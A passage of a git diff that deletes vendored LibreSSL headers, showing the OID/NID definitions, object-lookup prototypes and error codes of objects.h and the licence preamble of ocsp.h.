-#define OBJ_netscape_cert_sequence	OBJ_netscape_data_type,5L
-
-#define SN_desx_cbc			"DESX-CBC"
-#define LN_desx_cbc			"desx-cbc"
-#define NID_desx_cbc			80
-
-#define SN_id_ce			"id-ce"
-#define NID_id_ce			81
-#define OBJ_id_ce			2L,5L,29L
-
-#define SN_subject_key_identifier	"subjectKeyIdentifier"
-#define LN_subject_key_identifier	"X509v3 Subject Key Identifier"
-#define NID_subject_key_identifier	82
-#define OBJ_subject_key_identifier	OBJ_id_ce,14L
-
-#define SN_key_usage			"keyUsage"
-#define LN_key_usage			"X509v3 Key Usage"
-#define NID_key_usage			83
-#define OBJ_key_usage			OBJ_id_ce,15L
-
-#define SN_private_key_usage_period	"privateKeyUsagePeriod"
-#define LN_private_key_usage_period	"X509v3 Private Key Usage Period"
-#define NID_private_key_usage_period	84
-#define OBJ_private_key_usage_period	OBJ_id_ce,16L
-
-#define SN_subject_alt_name		"subjectAltName"
-#define LN_subject_alt_name		"X509v3 Subject Alternative Name"
-#define NID_subject_alt_name		85
-#define OBJ_subject_alt_name		OBJ_id_ce,17L
-
-#define SN_issuer_alt_name		"issuerAltName"
-#define LN_issuer_alt_name		"X509v3 Issuer Alternative Name"
-#define NID_issuer_alt_name		86
-#define OBJ_issuer_alt_name		OBJ_id_ce,18L
-
-#define SN_basic_constraints		"basicConstraints"
-#define LN_basic_constraints		"X509v3 Basic Constraints"
-#define NID_basic_constraints		87
-#define OBJ_basic_constraints		OBJ_id_ce,19L
-
-#define SN_crl_number			"crlNumber"
-#define LN_crl_number			"X509v3 CRL Number"
-#define NID_crl_number			88
-#define OBJ_crl_number			OBJ_id_ce,20L
-
-#define SN_certificate_policies		"certificatePolicies"
-#define LN_certificate_policies		"X509v3 Certificate Policies"
-#define NID_certificate_policies	89
-#define OBJ_certificate_policies	OBJ_id_ce,32L
-
-#define SN_authority_key_identifier	"authorityKeyIdentifier"
-#define LN_authority_key_identifier	"X509v3 Authority Key Identifier"
-#define NID_authority_key_identifier	90
-#define OBJ_authority_key_identifier	OBJ_id_ce,35L
-
-#define SN_bf_cbc			"BF-CBC"
-#define LN_bf_cbc			"bf-cbc"
-#define NID_bf_cbc			91
-#define OBJ_bf_cbc			1L,3L,6L,1L,4L,1L,3029L,1L,2L
-
-#define SN_bf_ecb			"BF-ECB"
-#define LN_bf_ecb			"bf-ecb"
-#define NID_bf_ecb			92
-
-#define SN_bf_cfb64			"BF-CFB"
-#define LN_bf_cfb64			"bf-cfb"
-#define NID_bf_cfb64			93
-
-#define SN_bf_ofb64			"BF-OFB"
-#define LN_bf_ofb64			"bf-ofb"
-#define NID_bf_ofb64			94
-
-#define SN_mdc2				"MDC2"
-#define LN_mdc2				"mdc2"
-#define NID_mdc2			95
-#define OBJ_mdc2			2L,5L,8L,3L,101L
-/* An alternative?			1L,3L,14L,3L,2L,19L */
-
-#define SN_mdc2WithRSA			"RSA-MDC2"
-#define LN_mdc2WithRSA			"mdc2withRSA"
-#define NID_mdc2WithRSA			96
-#define OBJ_mdc2WithRSA			2L,5L,8L,3L,100L
-
-#define SN_rc4_40			"RC4-40"
-#define LN_rc4_40			"rc4-40"
-#define NID_rc4_40			97
-
-#define SN_rc2_40_cbc			"RC2-40-CBC"
-#define LN_rc2_40_cbc			"rc2-40-cbc"
-#define NID_rc2_40_cbc			98
-
-#define SN_givenName			"G"
-#define LN_givenName			"givenName"
-#define NID_givenName			99
-#define OBJ_givenName			OBJ_X509,42L
-
-#define SN_surname			"S"
-#define LN_surname			"surname"
-#define NID_surname			100
-#define OBJ_surname			OBJ_X509,4L
-
-#define SN_initials			"I"
-#define LN_initials			"initials"
-#define NID_initials			101
-#define OBJ_initials			OBJ_X509,43L
-
-#define SN_uniqueIdentifier		"UID"
-#define LN_uniqueIdentifier		"uniqueIdentifier"
-#define NID_uniqueIdentifier		102
-#define OBJ_uniqueIdentifier		OBJ_X509,45L
-
-#define SN_crl_distribution_points	"crlDistributionPoints"
-#define LN_crl_distribution_points	"X509v3 CRL Distribution Points"
-#define NID_crl_distribution_points	103
-#define OBJ_crl_distribution_points	OBJ_id_ce,31L
-
-#define SN_md5WithRSA			"RSA-NP-MD5"
-#define LN_md5WithRSA			"md5WithRSA"
-#define NID_md5WithRSA			104
-#define OBJ_md5WithRSA			OBJ_algorithm,3L
-
-#define SN_serialNumber			"SN"
-#define LN_serialNumber			"serialNumber"
-#define NID_serialNumber		105
-#define OBJ_serialNumber		OBJ_X509,5L
-
-#define SN_title			"T"
-#define LN_title			"title"
-#define NID_title			106
-#define OBJ_title			OBJ_X509,12L
-
-#define SN_description			"D"
-#define LN_description			"description"
-#define NID_description			107
-#define OBJ_description			OBJ_X509,13L
-
-/* CAST5 is CAST-128, I'm just sticking with the documentation */
-#define SN_cast5_cbc			"CAST5-CBC"
-#define LN_cast5_cbc			"cast5-cbc"
-#define NID_cast5_cbc			108
-#define OBJ_cast5_cbc			1L,2L,840L,113533L,7L,66L,10L
-
-#define SN_cast5_ecb			"CAST5-ECB"
-#define LN_cast5_ecb			"cast5-ecb"
-#define NID_cast5_ecb			109
-
-#define SN_cast5_cfb64			"CAST5-CFB"
-#define LN_cast5_cfb64			"cast5-cfb"
-#define NID_cast5_cfb64			110
-
-#define SN_cast5_ofb64			"CAST5-OFB"
-#define LN_cast5_ofb64			"cast5-ofb"
-#define NID_cast5_ofb64			111
-
-#define LN_pbeWithMD5AndCast5_CBC	"pbeWithMD5AndCast5CBC"
-#define NID_pbeWithMD5AndCast5_CBC	112
-#define OBJ_pbeWithMD5AndCast5_CBC	1L,2L,840L,113533L,7L,66L,12L
-
-/* This is one sun will soon be using :-(
- * id-dsa-with-sha1 ID  ::= {
- *   iso(1) member-body(2) us(840) x9-57 (10040) x9cm(4) 3 }
- */
-#define SN_dsaWithSHA1			"DSA-SHA1"
-#define LN_dsaWithSHA1			"dsaWithSHA1"
-#define NID_dsaWithSHA1			113
-#define OBJ_dsaWithSHA1			1L,2L,840L,10040L,4L,3L
-
-#define NID_md5_sha1			114
-#define SN_md5_sha1			"MD5-SHA1"
-#define LN_md5_sha1			"md5-sha1"
-
-#define SN_sha1WithRSA			"RSA-SHA1-2"
-#define LN_sha1WithRSA			"sha1WithRSA"
-#define NID_sha1WithRSA			115
-#define OBJ_sha1WithRSA			OBJ_algorithm,29L
-
-#define SN_dsa				"DSA"
-#define LN_dsa				"dsaEncryption"
-#define NID_dsa				116
-#define OBJ_dsa				1L,2L,840L,10040L,4L,1L
-
-#define SN_ripemd160			"RIPEMD160"
-#define LN_ripemd160			"ripemd160"
-#define NID_ripemd160			117
-#define OBJ_ripemd160			1L,3L,36L,3L,2L,1L
-
-/* The name should actually be rsaSignatureWithripemd160, but I'm going
- * to continue using the convention I'm using with the other ciphers */
-#define SN_ripemd160WithRSA		"RSA-RIPEMD160"
-#define LN_ripemd160WithRSA		"ripemd160WithRSA"
-#define NID_ripemd160WithRSA		119
-#define OBJ_ripemd160WithRSA		1L,3L,36L,3L,3L,1L,2L
-
-/* Taken from rfc2040
- *  RC5_CBC_Parameters ::= SEQUENCE {
- *	version           INTEGER (v1_0(16)),
- *	rounds            INTEGER (8..127),
- *	blockSizeInBits   INTEGER (64, 128),
- *	iv                OCTET STRING OPTIONAL
- *	}
- */
-#define SN_rc5_cbc			"RC5-CBC"
-#define LN_rc5_cbc			"rc5-cbc"
-#define NID_rc5_cbc			120
-#define OBJ_rc5_cbc			OBJ_rsadsi,3L,8L
-
-#define SN_rc5_ecb			"RC5-ECB"
-#define LN_rc5_ecb			"rc5-ecb"
-#define NID_rc5_ecb			121
-
-#define SN_rc5_cfb64			"RC5-CFB"
-#define LN_rc5_cfb64			"rc5-cfb"
-#define NID_rc5_cfb64			122
-
-#define SN_rc5_ofb64			"RC5-OFB"
-#define LN_rc5_ofb64			"rc5-ofb"
-#define NID_rc5_ofb64			123
-
-#define SN_rle_compression		"RLE"
-#define LN_rle_compression		"run length compression"
-#define NID_rle_compression		124
-#define OBJ_rle_compression		1L,1L,1L,1L,666L,1L
-
-#define SN_zlib_compression		"ZLIB"
-#define LN_zlib_compression		"zlib compression"
-#define NID_zlib_compression		125
-#define OBJ_zlib_compression		1L,1L,1L,1L,666L,2L
-
-#define SN_ext_key_usage		"extendedKeyUsage"
-#define LN_ext_key_usage		"X509v3 Extended Key Usage"
-#define NID_ext_key_usage		126
-#define OBJ_ext_key_usage		OBJ_id_ce,37
-
-#define SN_id_pkix			"PKIX"
-#define NID_id_pkix			127
-#define OBJ_id_pkix			1L,3L,6L,1L,5L,5L,7L
-
-#define SN_id_kp			"id-kp"
-#define NID_id_kp			128
-#define OBJ_id_kp			OBJ_id_pkix,3L
-
-/* PKIX extended key usage OIDs */
-
-#define SN_server_auth			"serverAuth"
-#define LN_server_auth			"TLS Web Server Authentication"
-#define NID_server_auth			129
-#define OBJ_server_auth			OBJ_id_kp,1L
-
-#define SN_client_auth			"clientAuth"
-#define LN_client_auth			"TLS Web Client Authentication"
-#define NID_client_auth			130
-#define OBJ_client_auth			OBJ_id_kp,2L
-
-#define SN_code_sign			"codeSigning"
-#define LN_code_sign			"Code Signing"
-#define NID_code_sign			131
-#define OBJ_code_sign			OBJ_id_kp,3L
-
-#define SN_email_protect		"emailProtection"
-#define LN_email_protect		"E-mail Protection"
-#define NID_email_protect		132
-#define OBJ_email_protect		OBJ_id_kp,4L
-
-#define SN_time_stamp			"timeStamping"
-#define LN_time_stamp			"Time Stamping"
-#define NID_time_stamp			133
-#define OBJ_time_stamp			OBJ_id_kp,8L
-
-/* Additional extended key usage OIDs: Microsoft */
-
-#define SN_ms_code_ind			"msCodeInd"
-#define LN_ms_code_ind			"Microsoft Individual Code Signing"
-#define NID_ms_code_ind			134
-#define OBJ_ms_code_ind			1L,3L,6L,1L,4L,1L,311L,2L,1L,21L
-
-#define SN_ms_code_com			"msCodeCom"
-#define LN_ms_code_com			"Microsoft Commercial Code Signing"
-#define NID_ms_code_com			135
-#define OBJ_ms_code_com			1L,3L,6L,1L,4L,1L,311L,2L,1L,22L
-
-#define SN_ms_ctl_sign			"msCTLSign"
-#define LN_ms_ctl_sign			"Microsoft Trust List Signing"
-#define NID_ms_ctl_sign			136
-#define OBJ_ms_ctl_sign			1L,3L,6L,1L,4L,1L,311L,10L,3L,1L
-
-#define SN_ms_sgc			"msSGC"
-#define LN_ms_sgc			"Microsoft Server Gated Crypto"
-#define NID_ms_sgc			137
-#define OBJ_ms_sgc			1L,3L,6L,1L,4L,1L,311L,10L,3L,3L
-
-#define SN_ms_efs			"msEFS"
-#define LN_ms_efs			"Microsoft Encrypted File System"
-#define NID_ms_efs			138
-#define OBJ_ms_efs			1L,3L,6L,1L,4L,1L,311L,10L,3L,4L
-
-/* Additional usage: Netscape */
-
-#define SN_ns_sgc			"nsSGC"
-#define LN_ns_sgc			"Netscape Server Gated Crypto"
-#define NID_ns_sgc			139
-#define OBJ_ns_sgc			OBJ_netscape,4L,1L
-
-#define SN_delta_crl			"deltaCRL"
-#define LN_delta_crl			"X509v3 Delta CRL Indicator"
-#define NID_delta_crl			140
-#define OBJ_delta_crl			OBJ_id_ce,27L
-
-#define SN_crl_reason			"CRLReason"
-#define LN_crl_reason			"CRL Reason Code"
-#define NID_crl_reason			141
-#define OBJ_crl_reason			OBJ_id_ce,21L
-
-#define SN_invalidity_date		"invalidityDate"
-#define LN_invalidity_date		"Invalidity Date"
-#define NID_invalidity_date		142
-#define OBJ_invalidity_date		OBJ_id_ce,24L
-
-#define SN_sxnet			"SXNetID"
-#define LN_sxnet			"Strong Extranet ID"
-#define NID_sxnet			143
-#define OBJ_sxnet			1L,3L,101L,1L,4L,1L
-
-/* PKCS12 and related OBJECT IDENTIFIERS */
-
-#define OBJ_pkcs12			OBJ_pkcs,12L
-#define OBJ_pkcs12_pbeids		OBJ_pkcs12, 1
-
-#define SN_pbe_WithSHA1And128BitRC4	"PBE-SHA1-RC4-128"
-#define LN_pbe_WithSHA1And128BitRC4	"pbeWithSHA1And128BitRC4"
-#define NID_pbe_WithSHA1And128BitRC4	144
-#define OBJ_pbe_WithSHA1And128BitRC4	OBJ_pkcs12_pbeids, 1L
-
-#define SN_pbe_WithSHA1And40BitRC4	"PBE-SHA1-RC4-40"
-#define LN_pbe_WithSHA1And40BitRC4	"pbeWithSHA1And40BitRC4"
-#define NID_pbe_WithSHA1And40BitRC4	145
-#define OBJ_pbe_WithSHA1And40BitRC4	OBJ_pkcs12_pbeids, 2L
-
-#define SN_pbe_WithSHA1And3_Key_TripleDES_CBC	"PBE-SHA1-3DES"
-#define LN_pbe_WithSHA1And3_Key_TripleDES_CBC	"pbeWithSHA1And3-KeyTripleDES-CBC"
-#define NID_pbe_WithSHA1And3_Key_TripleDES_CBC	146
-#define OBJ_pbe_WithSHA1And3_Key_TripleDES_CBC	OBJ_pkcs12_pbeids, 3L
-
-#define SN_pbe_WithSHA1And2_Key_TripleDES_CBC	"PBE-SHA1-2DES"
-#define LN_pbe_WithSHA1And2_Key_TripleDES_CBC	"pbeWithSHA1And2-KeyTripleDES-CBC"
-#define NID_pbe_WithSHA1And2_Key_TripleDES_CBC	147
-#define OBJ_pbe_WithSHA1And2_Key_TripleDES_CBC	OBJ_pkcs12_pbeids, 4L
-
-#define SN_pbe_WithSHA1And128BitRC2_CBC		"PBE-SHA1-RC2-128"
-#define LN_pbe_WithSHA1And128BitRC2_CBC		"pbeWithSHA1And128BitRC2-CBC"
-#define NID_pbe_WithSHA1And128BitRC2_CBC	148
-#define OBJ_pbe_WithSHA1And128BitRC2_CBC	OBJ_pkcs12_pbeids, 5L
-
-#define SN_pbe_WithSHA1And40BitRC2_CBC	"PBE-SHA1-RC2-40"
-#define LN_pbe_WithSHA1And40BitRC2_CBC	"pbeWithSHA1And40BitRC2-CBC"
-#define NID_pbe_WithSHA1And40BitRC2_CBC	149
-#define OBJ_pbe_WithSHA1And40BitRC2_CBC	OBJ_pkcs12_pbeids, 6L
-
-#define OBJ_pkcs12_Version1	OBJ_pkcs12, 10L
-
-#define OBJ_pkcs12_BagIds	OBJ_pkcs12_Version1, 1L
-
-#define LN_keyBag		"keyBag"
-#define NID_keyBag		150
-#define OBJ_keyBag		OBJ_pkcs12_BagIds, 1L
-
-#define LN_pkcs8ShroudedKeyBag	"pkcs8ShroudedKeyBag"
-#define NID_pkcs8ShroudedKeyBag	151
-#define OBJ_pkcs8ShroudedKeyBag	OBJ_pkcs12_BagIds, 2L
-
-#define LN_certBag		"certBag"
-#define NID_certBag		152
-#define OBJ_certBag		OBJ_pkcs12_BagIds, 3L
-
-#define LN_crlBag		"crlBag"
-#define NID_crlBag		153
-#define OBJ_crlBag		OBJ_pkcs12_BagIds, 4L
-
-#define LN_secretBag		"secretBag"
-#define NID_secretBag		154
-#define OBJ_secretBag		OBJ_pkcs12_BagIds, 5L
-
-#define LN_safeContentsBag	"safeContentsBag"
-#define NID_safeContentsBag	155
-#define OBJ_safeContentsBag	OBJ_pkcs12_BagIds, 6L
-
-#define LN_friendlyName		"friendlyName"
-#define	NID_friendlyName	156
-#define OBJ_friendlyName	OBJ_pkcs9, 20L
-
-#define LN_localKeyID		"localKeyID"
-#define	NID_localKeyID		157
-#define OBJ_localKeyID		OBJ_pkcs9, 21L
-
-#define OBJ_certTypes		OBJ_pkcs9, 22L
-
-#define LN_x509Certificate	"x509Certificate"
-#define	NID_x509Certificate	158
-#define OBJ_x509Certificate	OBJ_certTypes, 1L
-
-#define LN_sdsiCertificate	"sdsiCertificate"
-#define	NID_sdsiCertificate	159
-#define OBJ_sdsiCertificate	OBJ_certTypes, 2L
-
-#define OBJ_crlTypes		OBJ_pkcs9, 23L
-
-#define LN_x509Crl		"x509Crl"
-#define	NID_x509Crl		160
-#define OBJ_x509Crl		OBJ_crlTypes, 1L
-
-/* PKCS#5 v2 OIDs */
-
-#define LN_pbes2		"PBES2"
-#define NID_pbes2		161
-#define OBJ_pbes2		OBJ_pkcs,5L,13L
-
-#define LN_pbmac1		"PBMAC1"
-#define NID_pbmac1		162
-#define OBJ_pbmac1		OBJ_pkcs,5L,14L
-
-#define LN_hmacWithSHA1		"hmacWithSHA1"
-#define NID_hmacWithSHA1	163
-#define OBJ_hmacWithSHA1	OBJ_rsadsi,2L,7L
-
-/* Policy Qualifier Ids */
-
-#define LN_id_qt_cps		"Policy Qualifier CPS"
-#define SN_id_qt_cps		"id-qt-cps"
-#define NID_id_qt_cps		164
-#define OBJ_id_qt_cps		OBJ_id_pkix,2L,1L
-
-#define LN_id_qt_unotice	"Policy Qualifier User Notice"
-#define SN_id_qt_unotice	"id-qt-unotice"
-#define NID_id_qt_unotice	165
-#define OBJ_id_qt_unotice	OBJ_id_pkix,2L,2L
-
-#define SN_rc2_64_cbc			"RC2-64-CBC"
-#define LN_rc2_64_cbc			"rc2-64-cbc"
-#define NID_rc2_64_cbc			166
-
-#define SN_SMIMECapabilities		"SMIME-CAPS"
-#define LN_SMIMECapabilities		"S/MIME Capabilities"
-#define NID_SMIMECapabilities		167
-#define OBJ_SMIMECapabilities		OBJ_pkcs9,15L
-
-#define SN_pbeWithMD2AndRC2_CBC		"PBE-MD2-RC2-64"
-#define LN_pbeWithMD2AndRC2_CBC		"pbeWithMD2AndRC2-CBC"
-#define NID_pbeWithMD2AndRC2_CBC	168
-#define OBJ_pbeWithMD2AndRC2_CBC	OBJ_pkcs,5L,4L
-
-#define SN_pbeWithMD5AndRC2_CBC		"PBE-MD5-RC2-64"
-#define LN_pbeWithMD5AndRC2_CBC		"pbeWithMD5AndRC2-CBC"
-#define NID_pbeWithMD5AndRC2_CBC	169
-#define OBJ_pbeWithMD5AndRC2_CBC	OBJ_pkcs,5L,6L
-
-#define SN_pbeWithSHA1AndDES_CBC	"PBE-SHA1-DES"
-#define LN_pbeWithSHA1AndDES_CBC	"pbeWithSHA1AndDES-CBC"
-#define NID_pbeWithSHA1AndDES_CBC	170
-#define OBJ_pbeWithSHA1AndDES_CBC	OBJ_pkcs,5L,10L
-
-/* Extension request OIDs */
-
-#define LN_ms_ext_req			"Microsoft Extension Request"
-#define SN_ms_ext_req			"msExtReq"
-#define NID_ms_ext_req			171
-#define OBJ_ms_ext_req			1L,3L,6L,1L,4L,1L,311L,2L,1L,14L
-
-#define LN_ext_req			"Extension Request"
-#define SN_ext_req			"extReq"
-#define NID_ext_req			172
-#define OBJ_ext_req			OBJ_pkcs9,14L
-
-#define SN_name				"name"
-#define LN_name				"name"
-#define NID_name			173
-#define OBJ_name			OBJ_X509,41L
-
-#define SN_dnQualifier			"dnQualifier"
-#define LN_dnQualifier			"dnQualifier"
-#define NID_dnQualifier			174
-#define OBJ_dnQualifier			OBJ_X509,46L
-
-#define SN_id_pe			"id-pe"
-#define NID_id_pe			175
-#define OBJ_id_pe			OBJ_id_pkix,1L
-
-#define SN_id_ad			"id-ad"
-#define NID_id_ad			176
-#define OBJ_id_ad			OBJ_id_pkix,48L
-
-#define SN_info_access			"authorityInfoAccess"
-#define LN_info_access			"Authority Information Access"
-#define NID_info_access			177
-#define OBJ_info_access			OBJ_id_pe,1L
-
-#define SN_ad_OCSP			"OCSP"
-#define LN_ad_OCSP			"OCSP"
-#define NID_ad_OCSP			178
-#define OBJ_ad_OCSP			OBJ_id_ad,1L
-
-#define SN_ad_ca_issuers		"caIssuers"
-#define LN_ad_ca_issuers		"CA Issuers"
-#define NID_ad_ca_issuers		179
-#define OBJ_ad_ca_issuers		OBJ_id_ad,2L
-
-#define SN_OCSP_sign			"OCSPSigning"
-#define LN_OCSP_sign			"OCSP Signing"
-#define NID_OCSP_sign			180
-#define OBJ_OCSP_sign			OBJ_id_kp,9L
-#endif /* USE_OBJ_MAC */
-
-#include <openssl/bio.h>
-#include <openssl/asn1.h>
-
-#define	OBJ_NAME_TYPE_UNDEF		0x00
-#define	OBJ_NAME_TYPE_MD_METH		0x01
-#define	OBJ_NAME_TYPE_CIPHER_METH	0x02
-#define	OBJ_NAME_TYPE_PKEY_METH		0x03
-#define	OBJ_NAME_TYPE_COMP_METH		0x04
-#define	OBJ_NAME_TYPE_NUM		0x05
-
-#define	OBJ_NAME_ALIAS			0x8000
-
-#define OBJ_BSEARCH_VALUE_ON_NOMATCH		0x01
-#define OBJ_BSEARCH_FIRST_VALUE_ON_MATCH	0x02
-
-
-#ifdef  __cplusplus
-extern "C" {
-#endif
-
-typedef struct obj_name_st {
-	int type;
-	int alias;
-	const char *name;
-	const char *data;
-} OBJ_NAME;
-
-#define		OBJ_create_and_add_object(a,b,c) OBJ_create(a,b,c)
-
-
-int OBJ_NAME_init(void);
-int OBJ_NAME_new_index(unsigned long (*hash_func)(const char *),
-    int (*cmp_func)(const char *, const char *),
-    void (*free_func)(const char *, int, const char *));
-const char *OBJ_NAME_get(const char *name, int type);
-int OBJ_NAME_add(const char *name, int type, const char *data);
-int OBJ_NAME_remove(const char *name, int type);
-void OBJ_NAME_cleanup(int type); /* -1 for everything */
-void OBJ_NAME_do_all(int type, void (*fn)(const OBJ_NAME *, void *arg),
-    void *arg);
-void OBJ_NAME_do_all_sorted(int type, void (*fn)(const OBJ_NAME *, void *arg),
-    void *arg);
-
-ASN1_OBJECT *	OBJ_dup(const ASN1_OBJECT *o);
-ASN1_OBJECT *	OBJ_nid2obj(int n);
-const char *	OBJ_nid2ln(int n);
-const char *	OBJ_nid2sn(int n);
-int		OBJ_obj2nid(const ASN1_OBJECT *o);
-ASN1_OBJECT *	OBJ_txt2obj(const char *s, int no_name);
-int	OBJ_obj2txt(char *buf, int buf_len, const ASN1_OBJECT *a, int no_name);
-int		OBJ_txt2nid(const char *s);
-int		OBJ_ln2nid(const char *s);
-int		OBJ_sn2nid(const char *s);
-int		OBJ_cmp(const ASN1_OBJECT *a, const ASN1_OBJECT *b);
-const void *	OBJ_bsearch_(const void *key, const void *base, int num,
-		    int size, int (*cmp)(const void *, const void *));
-const void *	OBJ_bsearch_ex_(const void *key, const void *base, int num,
-		    int size, int (*cmp)(const void *, const void *),
-		    int flags);
-
-#ifndef LIBRESSL_INTERNAL
-
-#define _DECLARE_OBJ_BSEARCH_CMP_FN(scope, type1, type2, nm)	\
-  static int nm##_cmp_BSEARCH_CMP_FN(const void *, const void *); \
-  static int nm##_cmp(type1 const *, type2 const *); \
-  scope type2 * OBJ_bsearch_##nm(type1 *key, type2 const *base, int num)
-
-#define DECLARE_OBJ_BSEARCH_CMP_FN(type1, type2, cmp)	\
-  _DECLARE_OBJ_BSEARCH_CMP_FN(static, type1, type2, cmp)
-#define DECLARE_OBJ_BSEARCH_GLOBAL_CMP_FN(type1, type2, nm)	\
-  type2 * OBJ_bsearch_##nm(type1 *key, type2 const *base, int num)
-
-/*
- * Unsolved problem: if a type is actually a pointer type, like
- * nid_triple is, then its impossible to get a const where you need
- * it. Consider:
- *
- * typedef int nid_triple[3];
- * const void *a_;
- * const nid_triple const *a = a_;
- *
- * The assignement discards a const because what you really want is:
- *
- * const int const * const *a = a_;
- *
- * But if you do that, you lose the fact that a is an array of 3 ints,
- * which breaks comparison functions.
- *
- * Thus we end up having to cast, sadly, or unpack the
- * declarations. Or, as I finally did in this case, delcare nid_triple
- * to be a struct, which it should have been in the first place.
- *
- * Ben, August 2008.
- *
- * Also, strictly speaking not all types need be const, but handling
- * the non-constness means a lot of complication, and in practice
- * comparison routines do always not touch their arguments.
- */
-
-#define IMPLEMENT_OBJ_BSEARCH_CMP_FN(type1, type2, nm)	\
-  static int nm##_cmp_BSEARCH_CMP_FN(const void *a_, const void *b_)	\
-      { \
-      type1 const *a = a_; \
-      type2 const *b = b_; \
-      return nm##_cmp(a,b); \
-      } \
-  static type2 *OBJ_bsearch_##nm(type1 *key, type2 const *base, int num) \
-      { \
-      return (type2 *)OBJ_bsearch_(key, base, num, sizeof(type2), \
-					nm##_cmp_BSEARCH_CMP_FN); \
-      } \
-      extern void dummy_prototype(void)
-
-#define IMPLEMENT_OBJ_BSEARCH_GLOBAL_CMP_FN(type1, type2, nm)	\
-  static int nm##_cmp_BSEARCH_CMP_FN(const void *a_, const void *b_)	\
-      { \
-      type1 const *a = a_; \
-      type2 const *b = b_; \
-      return nm##_cmp(a,b); \
-      } \
-  type2 *OBJ_bsearch_##nm(type1 *key, type2 const *base, int num) \
-      { \
-      return (type2 *)OBJ_bsearch_(key, base, num, sizeof(type2), \
-					nm##_cmp_BSEARCH_CMP_FN); \
-      } \
-      extern void dummy_prototype(void)
-
-#define OBJ_bsearch(type1,key,type2,base,num,cmp)			       \
-  ((type2 *)OBJ_bsearch_(CHECKED_PTR_OF(type1,key),CHECKED_PTR_OF(type2,base), \
-			 num,sizeof(type2),				\
-			 ((void)CHECKED_PTR_OF(type1,cmp##_type_1),	\
-			  (void)CHECKED_PTR_OF(type2,cmp##_type_2),	\
-			  cmp##_BSEARCH_CMP_FN)))
-
-#define OBJ_bsearch_ex(type1,key,type2,base,num,cmp,flags)			\
-  ((type2 *)OBJ_bsearch_ex_(CHECKED_PTR_OF(type1,key),CHECKED_PTR_OF(type2,base), \
-			 num,sizeof(type2),				\
-			 ((void)CHECKED_PTR_OF(type1,cmp##_type_1),	\
-			  (void)type_2=CHECKED_PTR_OF(type2,cmp##_type_2), \
-			  cmp##_BSEARCH_CMP_FN)),flags)
-
-#endif /* !LIBRESSL_INTERNAL */
-
-int		OBJ_new_nid(int num);
-int		OBJ_add_object(const ASN1_OBJECT *obj);
-int		OBJ_create(const char *oid, const char *sn, const char *ln);
-void		OBJ_cleanup(void );
-int		OBJ_create_objects(BIO *in);
-
-int OBJ_find_sigid_algs(int signid, int *pdig_nid, int *ppkey_nid);
-int OBJ_find_sigid_by_algs(int *psignid, int dig_nid, int pkey_nid);
-int OBJ_add_sigid(int signid, int dig_id, int pkey_id);
-void OBJ_sigid_free(void);
-
-extern int obj_cleanup_defer;
-void check_defer(int nid);
-
-/* BEGIN ERROR CODES */
-/* The following lines are auto generated by the script mkerr.pl. Any changes
- * made after this point may be overwritten when the script is next run.
- */
-void ERR_load_OBJ_strings(void);
-
-/* Error codes for the OBJ functions. */
-
-/* Function codes. */
-#define OBJ_F_OBJ_ADD_OBJECT				 105
-#define OBJ_F_OBJ_CREATE				 100
-#define OBJ_F_OBJ_DUP					 101
-#define OBJ_F_OBJ_NAME_NEW_INDEX			 106
-#define OBJ_F_OBJ_NID2LN				 102
-#define OBJ_F_OBJ_NID2OBJ				 103
-#define OBJ_F_OBJ_NID2SN				 104
-
-/* Reason codes. */
-#define OBJ_R_MALLOC_FAILURE				 100
-#define OBJ_R_UNKNOWN_NID				 101
-
-#ifdef  __cplusplus
-}
-#endif
-#endif
diff --git a/thirdparty/libressl/include/openssl/ocsp.h b/thirdparty/libressl/include/openssl/ocsp.h
deleted file mode 100644
index e3fa6f5..0000000
--- a/thirdparty/libressl/include/openssl/ocsp.h
+++ /dev/null
@@ -1,669 +0,0 @@
-/* $OpenBSD: ocsp.h,v 1.11 2016/12/30 16:19:04 jsing Exp $ */
-/* Written by Tom Titchener <Tom_Titchener@groove.net> for the OpenSSL
- * project. */
-
-/* History:
-   This file was transfered to Richard Levitte from CertCo by Kathy
-   Weinhold in mid-spring 2000 to be included in OpenSSL or released
-   as a patch kit. */
-
-/* ====================================================================
- * Copyright (c) 1998-2000 The OpenSSL Project.  All rights reserved.
- *
- * Redistribution and use in source and binary forms, with or without
- * modification, are permitted provided that the following conditions
- * are met:
- *
- * 1. Redistributions of source code must retain the above copyright
- *    notice, this list of conditions and the following disclaimer.
- *
- * 2. Redistributions in binary form must reproduce the above copyright
- *    notice, this list of conditions and the following disclaimer in
- *    the documentation and/or other materials provided with the
- *    distribution.
- *
- * 3. All advertising materials mentioning features or use of this
- *    software must display the following acknowledgment:
- *    "This product includes software developed by the OpenSSL Project
- *    for use in the OpenSSL Toolkit. (http://www.openssl.org/)"
- *
- * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
- *    endorse or promote products derived from this software without
- *    prior written permission. For written permission, please contact
- *    openssl-core@openssl.org.
- *
- * 5. Products derived from this software may not be called "OpenSSL"
- *    nor may "OpenSSL" appear in their names without prior written
- *    permission of the OpenSSL Project.
- *
- * 6. Redistributions of any form whatsoever must retain the following
- *    acknowledgment:
- *    "This product includes software developed by the OpenSSL Project
- *    for use in the OpenSSL Toolkit (http://www.openssl.org/)"
- *
- * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
- * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
- * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
- * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
- * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
- * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
- * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
- * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
- * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
- * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
- * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
- * OF THE POSSIBILITY OF SUCH DAMAGE.
- * ====================================================================
- *
- * This product includes cryptographic software written by Eric Young
- * (eay@cryptsoft.com).  This product includes software written by Tim
- * Hudson (tjh@cryptsoft.com).
- *
- */
-
-#ifndef HEADER_OCSP_H
-#define HEADER_OCSP_H
-
-#include <openssl/ossl_typ.h>
-#include <openssl/x509.h>
-#include <openssl/x509v3.h>
